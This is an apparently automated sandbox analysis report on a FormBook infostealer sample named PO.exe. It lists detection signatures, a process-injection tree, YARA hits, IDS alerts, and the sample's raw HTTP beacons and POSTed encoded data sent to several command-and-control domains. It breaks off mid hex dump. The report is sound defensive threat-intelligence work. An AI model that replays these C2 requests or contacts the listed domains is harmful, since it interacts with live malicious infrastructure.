Windows Analysis Report
PO.exe

Overview

General Information

Sample name: PO.exe
Analysis ID: 1612356
MD5: 351a691669abf4dcbdb3f393b2f3e183
SHA1: c6a72eb864082996d4673185fe89bf45ebea6f7b
SHA256: 7b6dbf313708726318645aa72ecabe962572e8008214dffab03c151012c2df68
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PO.exe (PID: 5932 cmdline: "C:\Users\user\Desktop\PO.exe" MD5: 351A691669ABF4DCBDB3F393B2F3E183)
    • PO.exe (PID: 5012 cmdline: "C:\Users\user\Desktop\PO.exe" MD5: 351A691669ABF4DCBDB3F393B2F3E183)
      • vfAu7gBmmnuGpQ5Y.exe (PID: 3220 cmdline: "C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\lp0hQtG6P0.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • net.exe (PID: 7120 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • vfAu7gBmmnuGpQ5Y.exe (PID: 5580 cmdline: "C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\7Qeewu5lIKK.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 3260 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.3001987219.0000000000420000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3003697143.0000000000970000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2274480081.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.3003263592.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2275144613.0000000001460000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.PO.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.PO.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-11T18:53:42.065591+0100 | 2859622 | 1 | Exploit Kit Activity Detected | 104.21.35.208 | 80 | 192.168.2.4 | 50022 | TCP
2025-02-11T18:53:44.839098+0100 | 2859622 | 1 | Exploit Kit Activity Detected | 104.21.35.208 | 80 | 192.168.2.4 | 50023 | TCP

                AV Detection

Source: PO.exe | Virustotal: Detection: 69%
Source: PO.exe | ReversingLabs: Detection: 67%
Source: Yara match | File source: 2.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3001987219.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3003697143.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2274480081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3003263592.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2275144613.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3003792289.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3003894654.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2276815153.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PO.exe | Joe Sandbox ML: detected
Source: PO.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PO.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: net.pdbUGP source: PO.exe, 00000002.00000002.2274931580.0000000001267000.00000004.00000020.00020000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3002888129.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: PO.exe, 00000002.00000002.2275360334.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000002.3004329327.0000000002FBE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2281965657.0000000002C72000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2278704167.0000000000978000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3004329327.0000000002E20000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PO.exe, PO.exe, 00000002.00000002.2275360334.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 00000007.00000002.3004329327.0000000002FBE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2281965657.0000000002C72000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2278704167.0000000000978000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3004329327.0000000002E20000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: net.pdb source: PO.exe, 00000002.00000002.2274931580.0000000001267000.00000004.00000020.00020000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3002888129.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3002681126.000000000097F000.00000002.00000001.01000000.0000000C.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3002866033.000000000097F000.00000002.00000001.01000000.0000000C.sdmp
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_0043C680 FindFirstFileW,FindNextFileW,FindClose | 7_2_0043C680
Source: C:\Windows\SysWOW64\net.exe | Code function: 4x nop then xor eax, eax | 7_2_00429E40
Source: C:\Windows\SysWOW64\net.exe | Code function: 4x nop then pop edi | 7_2_0042E248
Source: C:\Windows\SysWOW64\net.exe | Code function: 4x nop then mov ebx, 00000004h | 7_2_00AC04E8

                Networking

Source: Network traffic | Suricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 104.21.35.208:80 -> 192.168.2.4:50022
Source: Network traffic | Suricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 104.21.35.208:80 -> 192.168.2.4:50023
Source: DNS query: www.erectus.xyz
Source: Joe Sandbox View | IP Address: 192.64.118.221
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /9kj6/?92tD=AVccbOSLL/+N4XgwVpb4SHGSnAGJIc2w8rOLkxaC3AvUfASlWswjdaveGA5SPzmQwtpsnNNz41sXTUjryKzeRTK3cv4i7oHGDeN1DGdqMP4Wc9jKpdKBVJQ=&ODj=aVdxTb HTTP/1.1
    Host: www.cloud-kuprof2.click
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /cjko/?92tD=3gJzY2hwuTATu+wgM7M2aW4tC9U6eyI05FbsBlp+k+3zOYzda5y9e/SDhnP1PIg0Yh4jO5HOCpt/RLpJrfWBqfOHUxMMiqNoXrahRjaCwOMkcSKIcBEhJK4=&ODj=aVdxTb HTTP/1.1
    Host: www.erectus.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /c3c5/?92tD=2X6TFJqSBkan8qpDKqB3foPaC+q2tUyYHYLE9NMufHiS9CuR8q99XAqJ5/x0mYnwttbXYsDuQMFmGta9SThVpupVHhzg9UTUXnuJin70LkdCs8vRTrMDdWY=&ODj=aVdxTb HTTP/1.1
    Host: www.fineitemrealm.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /6wg4/?92tD=e2yux1VtJoqvcqg+8AukcEcVwMVT+Sjl/1eDxHdMS7mzrr0SxU8linEjJM3sYoPzrw66qF8Oj5XhrJTjkHQqvun9I0YvCDnVTdCWSCRzvr5pslrpMRangDo=&ODj=aVdxTb HTTP/1.1
    Host: www.globalcase.website
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.cloud-kuprof2.click
Source: global traffic | DNS traffic detected: DNS query: www.erectus.xyz
Source: global traffic | DNS traffic detected: DNS query: www.fineitemrealm.shop
Source: global traffic | DNS traffic detected: DNS query: www.globalcase.website
Source: global traffic | DNS traffic detected: DNS query: www.adjokctp.icu
Source: unknown | HTTP traffic detected:
    POST /cjko/ HTTP/1.1
    Host: www.erectus.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US
    Cache-Control: no-cache
    Content-Length: 201
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Origin: http://www.erectus.xyz
    Referer: http://www.erectus.xyz/cjko/
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
    Data Raw: 39 32 74 44 3d 36 69 68 54 62 44 55 33 2b 54 4a 33 32 4a 35 66 63 59 41 41 56 57 59 6f 50 62 67 6a 63 67 63 46 39 48 6e 6f 56 6c 6c 35 36 63 58 4e 4f 59 7a 54 46 70 65 59 66 4a 57 66 74 30 4f 4b 53 6f 38 55 41 77 59 38 41 6f 43 45 43 35 64 5a 42 4c 49 4a 31 4d 6a 77 69 2b 54 6e 54 52 38 4f 73 4f 5a 31 63 4f 6d 73 58 7a 43 4d 32 65 4e 4d 66 67 54 6d 63 6c 49 32 50 36 64 61 30 46 78 44 37 53 42 32 31 6d 6f 68 6f 45 76 73 6f 61 72 50 4d 69 66 53 43 43 73 51 4b 50 6c 68 44 2b 38 43 64 47 7a 31 31 74 79 6e 4b 72 4f 62 4a 38 6d 43 44 4e 4e 6b 42 42 4f 75 69 78 43 6f 57 62 69 50 67 4b 54 58 63 41 3d 3d
    Data Ascii: 92tD=6ihTbDU3+TJ32J5fcYAAVWYoPbgjcgcF9HnoVll56cXNOYzTFpeYfJWft0OKSo8UAwY8AoCEC5dZBLIJ1Mjwi+TnTR8OsOZ1cOmsXzCM2eNMfgTmclI2P6da0FxD7SB21mohoEvsoarPMifSCCsQKPlhD+8CdGz11tynKrObJ8mCDNNkBBOuixCoWbiPgKTXcA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 11 Feb 2025 17:52:46 GMTContent-Type: text/htmlContent-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx/1.26.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Feb 2025 17:53:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Wed, 20 Mar 2024 08:46:13 GMTETag: W/"49d-614139f7d9e8f"Content-Encoding: gzipData Raw: 32 34 62 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ad 53 4d 73 da 30 10 bd e7 57 6c 9d b3 11 86 7c 21 8c 67 52 4c a6 9d 49 52 a6 38 93 f6 28 ec 05 6b 2a cb ae b5 c1 d0 4c ff 7b e5 0f 02 99 b6 e9 a5 f2 c1 d2 ee db f7 9e 34 bb fe bb f0 d3 34 fa 3a 9f 41 4a 99 82 f9 c3 fb db 8f 53 70 5c c6 1e 87 53 c6 c2 28 84 2f 1f a2 bb 5b f0 7a 7d 58 50 29 63 62 6c 76 ef 80 93 12 15 9c b1 aa aa 7a d5 b0 97 97 6b 16 7d 66 db 9a c5 ab cb ba ad 6b 9a 9a 5e 42 89 13 9c f8 8d c8 36 53 da 4c fe 40 e0 8d 46 a3 b6 ce a9 41 5c 09 bd 9e 38 a8 1d 78 d9 05 7e 8a 22 09 4e c0 2e 9f 24 29 0c 1e 71 69 24 21 2c 9e 4c 81 3a c1 c4 67 6d a2 05 65 48 02 6a 2d 17 bf 3f c9 cd c4 99 e6 9a 50 93 1b ed 0a 74 20 6e 4f 13 87 70 4b ac d6 1e 43 9c 8a d2 20 4d 1e a2 1b f7 ca 61 c7 44 5a 64 38 71 12 34 71 29 0b 92 b9 3e 62 88 52 69 a0 ea dc a4 c2 c0 12 51 83 d9 db ea bd 30 19 da 29 04 b2 fa 9d 6c 6c 8c d3 e6 ea b5 cc 93 1d 3c af 2c ad 6b e4 0f e4 de 59 b1 b5 a6 72 95 97 fc f4 b2 59 63 68 d2 2b 91 49 b5 e3 a2 94 c2 da ae a9 5c a1 e4 5a f3 d8 1a c2 72 fc f3 85 33 f5 8e 19 af 8e 19 47 a3 eb cb eb 9b 31 64 a2 5c 4b cd e1 b2 5f 6c a1 5f 7f c7 f5 03 78 6e f1 70 1a ce 2e a6 e7 e1 6b 0b d0 79 38 68 c0 a0 5f 8b 34 81 0a e5 3a 25 6e 6f a6 92 31 28 24 6b ce 35 85 88 a5 5e 73 70 bd 1a b8 97 f7 ce 1b f9 81 fd 1d e9 17 f0 5c c9 84 52 3e 6c 69 7f bf 6b 47 e0 2a 5c 11 17 4f 94 8f bb 40 d9 68 37 91 3d 86 f2 82 c3 b0 be e7 41 21 91 9b ff a2 71 60 14 5c 49 fd ed f0 6e c3 b3 f3 e1 c5 f5 2b c0 46 d6 cd 92 bc 89 11 31 c9 0d be 09 49 f3 0d 96 7f 41 f8 ac 69 37 3b 7c ac 1d 1d bf ee af ae 13 53 2f 58 3c 2c e6 b3 fb 70 16 da bc b7 0f 0f 82 7f 35 b3 45 0f 3a b4 7d b9 43 f3 ce 15 0a 83 cd 50 58 e3 40 a9 6d 74 8c 53 
2d 63 a1 6c 79 51 e4 25 41 82 85 28 29 b3 8f da eb 3c 36 1c 3e 6b ad f9 cd 1c 06 27 bf 00 dc 27 15 ee 9d 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 24bSMs0Wl|!gRLIR8(k*L{44:AJSp\S(/[z}XP)cblvzk}fk^B6SL@FA\8x~"N.$)qi$!,L:gmeHj-?Pt nOpKC MaDZd8q4q)>bRiQ0)ll<,kYrYch+I\Zr3G1d\K_l_xnp.ky8h_4:%no1($k5^sp\R>likG*\O@h7=A!q`\In+F1IAi7;|S/X<,p5E:}CPX@mtS-clyQ%A()<6>k''0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Feb 2025 17:53:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Wed, 20 Mar 2024 08:46:13 GMTETag: W/"49d-614139f7d9e8f"Content-Encoding: gzipData Raw: 32 34 62 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ad 53 4d 73 da 30 10 bd e7 57 6c 9d b3 11 86 7c 21 8c 67 52 4c a6 9d 49 52 a6 38 93 f6 28 ec 05 6b 2a cb ae b5 c1 d0 4c ff 7b e5 0f 02 99 b6 e9 a5 f2 c1 d2 ee db f7 9e 34 bb fe bb f0 d3 34 fa 3a 9f 41 4a 99 82 f9 c3 fb db 8f 53 70 5c c6 1e 87 53 c6 c2 28 84 2f 1f a2 bb 5b f0 7a 7d 58 50 29 63 62 6c 76 ef 80 93 12 15 9c b1 aa aa 7a d5 b0 97 97 6b 16 7d 66 db 9a c5 ab cb ba ad 6b 9a 9a 5e 42 89 13 9c f8 8d c8 36 53 da 4c fe 40 e0 8d 46 a3 b6 ce a9 41 5c 09 bd 9e 38 a8 1d 78 d9 05 7e 8a 22 09 4e c0 2e 9f 24 29 0c 1e 71 69 24 21 2c 9e 4c 81 3a c1 c4 67 6d a2 05 65 48 02 6a 2d 17 bf 3f c9 cd c4 99 e6 9a 50 93 1b ed 0a 74 20 6e 4f 13 87 70 4b ac d6 1e 43 9c 8a d2 20 4d 1e a2 1b f7 ca 61 c7 44 5a 64 38 71 12 34 71 29 0b 92 b9 3e 62 88 52 69 a0 ea dc a4 c2 c0 12 51 83 d9 db ea bd 30 19 da 29 04 b2 fa 9d 6c 6c 8c d3 e6 ea b5 cc 93 1d 3c af 2c ad 6b e4 0f e4 de 59 b1 b5 a6 72 95 97 fc f4 b2 59 63 68 d2 2b 91 49 b5 e3 a2 94 c2 da ae a9 5c a1 e4 5a f3 d8 1a c2 72 fc f3 85 33 f5 8e 19 af 8e 19 47 a3 eb cb eb 9b 31 64 a2 5c 4b cd e1 b2 5f 6c a1 5f 7f c7 f5 03 78 6e f1 70 1a ce 2e a6 e7 e1 6b 0b d0 79 38 68 c0 a0 5f 8b 34 81 0a e5 3a 25 6e 6f a6 92 31 28 24 6b ce 35 85 88 a5 5e 73 70 bd 1a b8 97 f7 ce 1b f9 81 fd 1d e9 17 f0 5c c9 84 52 3e 6c 69 7f bf 6b 47 e0 2a 5c 11 17 4f 94 8f bb 40 d9 68 37 91 3d 86 f2 82 c3 b0 be e7 41 21 91 9b ff a2 71 60 14 5c 49 fd ed f0 6e c3 b3 f3 e1 c5 f5 2b c0 46 d6 cd 92 bc 89 11 31 c9 0d be 09 49 f3 0d 96 7f 41 f8 ac 69 37 3b 7c ac 1d 1d bf ee af ae 13 53 2f 58 3c 2c e6 b3 fb 70 16 da bc b7 0f 0f 82 7f 35 b3 45 0f 3a b4 7d b9 43 f3 ce 15 0a 83 cd 50 58 e3 40 a9 6d 74 8c 53 
2d 63 a1 6c 79 51 e4 25 41 82 85 28 29 b3 8f da eb 3c 36 1c 3e 6b ad f9 cd 1c 06 27 bf 00 dc 27 15 ee 9d 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 24bSMs0Wl|!gRLIR8(k*L{44:AJSp\S(/[z}XP)cblvzk}fk^B6SL@FA\8x~"N.$)qi$!,L:gmeHj-?Pt nOpKC MaDZd8q4q)>bRiQ0)ll<,kYrYch+I\Zr3G1d\K_l_xnp.ky8h_4:%no1($k5^sp\R>likG*\O@h7=A!q`\In+F1IAi7;|S/X<,p5E:}CPX@mtS-clyQ%A()<6>k''0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Feb 2025 17:53:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Wed, 20 Mar 2024 08:46:13 GMTETag: W/"49d-614139f7d9e8f"Content-Encoding: gzipData Raw: 32 34 62 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ad 53 4d 73 da 30 10 bd e7 57 6c 9d b3 11 86 7c 21 8c 67 52 4c a6 9d 49 52 a6 38 93 f6 28 ec 05 6b 2a cb ae b5 c1 d0 4c ff 7b e5 0f 02 99 b6 e9 a5 f2 c1 d2 ee db f7 9e 34 bb fe bb f0 d3 34 fa 3a 9f 41 4a 99 82 f9 c3 fb db 8f 53 70 5c c6 1e 87 53 c6 c2 28 84 2f 1f a2 bb 5b f0 7a 7d 58 50 29 63 62 6c 76 ef 80 93 12 15 9c b1 aa aa 7a d5 b0 97 97 6b 16 7d 66 db 9a c5 ab cb ba ad 6b 9a 9a 5e 42 89 13 9c f8 8d c8 36 53 da 4c fe 40 e0 8d 46 a3 b6 ce a9 41 5c 09 bd 9e 38 a8 1d 78 d9 05 7e 8a 22 09 4e c0 2e 9f 24 29 0c 1e 71 69 24 21 2c 9e 4c 81 3a c1 c4 67 6d a2 05 65 48 02 6a 2d 17 bf 3f c9 cd c4 99 e6 9a 50 93 1b ed 0a 74 20 6e 4f 13 87 70 4b ac d6 1e 43 9c 8a d2 20 4d 1e a2 1b f7 ca 61 c7 44 5a 64 38 71 12 34 71 29 0b 92 b9 3e 62 88 52 69 a0 ea dc a4 c2 c0 12 51 83 d9 db ea bd 30 19 da 29 04 b2 fa 9d 6c 6c 8c d3 e6 ea b5 cc 93 1d 3c af 2c ad 6b e4 0f e4 de 59 b1 b5 a6 72 95 97 fc f4 b2 59 63 68 d2 2b 91 49 b5 e3 a2 94 c2 da ae a9 5c a1 e4 5a f3 d8 1a c2 72 fc f3 85 33 f5 8e 19 af 8e 19 47 a3 eb cb eb 9b 31 64 a2 5c 4b cd e1 b2 5f 6c a1 5f 7f c7 f5 03 78 6e f1 70 1a ce 2e a6 e7 e1 6b 0b d0 79 38 68 c0 a0 5f 8b 34 81 0a e5 3a 25 6e 6f a6 92 31 28 24 6b ce 35 85 88 a5 5e 73 70 bd 1a b8 97 f7 ce 1b f9 81 fd 1d e9 17 f0 5c c9 84 52 3e 6c 69 7f bf 6b 47 e0 2a 5c 11 17 4f 94 8f bb 40 d9 68 37 91 3d 86 f2 82 c3 b0 be e7 41 21 91 9b ff a2 71 60 14 5c 49 fd ed f0 6e c3 b3 f3 e1 c5 f5 2b c0 46 d6 cd 92 bc 89 11 31 c9 0d be 09 49 f3 0d 96 7f 41 f8 ac 69 37 3b 7c ac 1d 1d bf ee af ae 13 53 2f 58 3c 2c e6 b3 fb 70 16 da bc b7 0f 0f 82 7f 35 b3 45 0f 3a b4 7d b9 43 f3 ce 15 0a 83 cd 50 58 e3 40 a9 6d 74 8c 53 
2d 63 a1 6c 79 51 e4 25 41 82 85 28 29 b3 8f da eb 3c 36 1c 3e 6b ad f9 cd 1c 06 27 bf 00 dc 27 15 ee 9d 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 24bSMs0Wl|!gRLIR8(k*L{44:AJSp\S(/[z}XP)cblvzk}fk^B6SL@FA\8x~"N.$)qi$!,L:gmeHj-?Pt nOpKC MaDZd8q4q)>bRiQ0)ll<,kYrYch+I\Zr3G1d\K_l_xnp.ky8h_4:%no1($k5^sp\R>likG*\O@h7=A!q`\In+F1IAi7;|S/X<,p5E:}CPX@mtS-clyQ%A()<6>k''0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Feb 2025 17:53:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 1181Connection: closeVary: Accept-EncodingLast-Modified: Wed, 20 Mar 2024 08:46:13 GMTETag: "49d-614139f7d9e8f"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 53 75 73 70 65 6e 64 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 